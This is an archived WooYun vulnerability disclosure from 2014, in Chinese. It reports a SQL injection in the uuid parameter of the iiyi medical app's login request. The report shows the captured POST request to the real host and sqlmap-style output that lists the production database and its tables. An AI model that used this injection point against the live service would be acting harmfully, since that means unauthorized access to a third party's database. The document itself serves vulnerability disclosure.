乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-12: 细节已通知厂商并且等待厂商处理中 2014-04-17: 厂商已经主动忽略漏洞,细节向公众公开
爱爱医app端注入
登录抓包
POST /zlzs/v6/user/login/ HTTP/1.1Content-Length: 105Content-Type: application/x-www-form-urlencodedHost: iapp.iiyi.comAccept-Encoding: gzipProxy-Connection: closeConnection: closeusername=test&version=62&signature=316fb0a67b25435b&os=2&uuid=864394014414512&password=test&channel=iiyi
POST注入 注入点uuid
数据库:
available databases [3]:[*] iiyicenter[*] information_schema[*] test
144个表 列表速度很慢慢慢...我就没有全部列举出来
fetching tables for database: 'iiyicenter'fetching number of tables for database 'iiyicenter'resumed: 144resumed: advertiseresumed: advertise_staticresumed: app_access_detailresumed: app_access_uuidresumed: app_activetyresumed: app_countsresumed: app_couponresumed: app_cbversionresumed: applica_contentresumed: applica_content_copyresumed: applica_dbversionresumed: applica_downdetialresumed: applica_perdownloadresumed: applica_sortresumed: band_recordsresumed: base_arearesumed: base_hospitalresumed: bbs_sphinxresumed: beans_orderresumed: caseresumed: case_adminresumed: case_collectionresumed: case_commentresuming partial value: case_comment_sup
这速度 受不鸟了、
↑
╮(╯▽╰)╭
危害等级:无影响厂商忽略
忽略时间:2014-04-17 20:08
暂无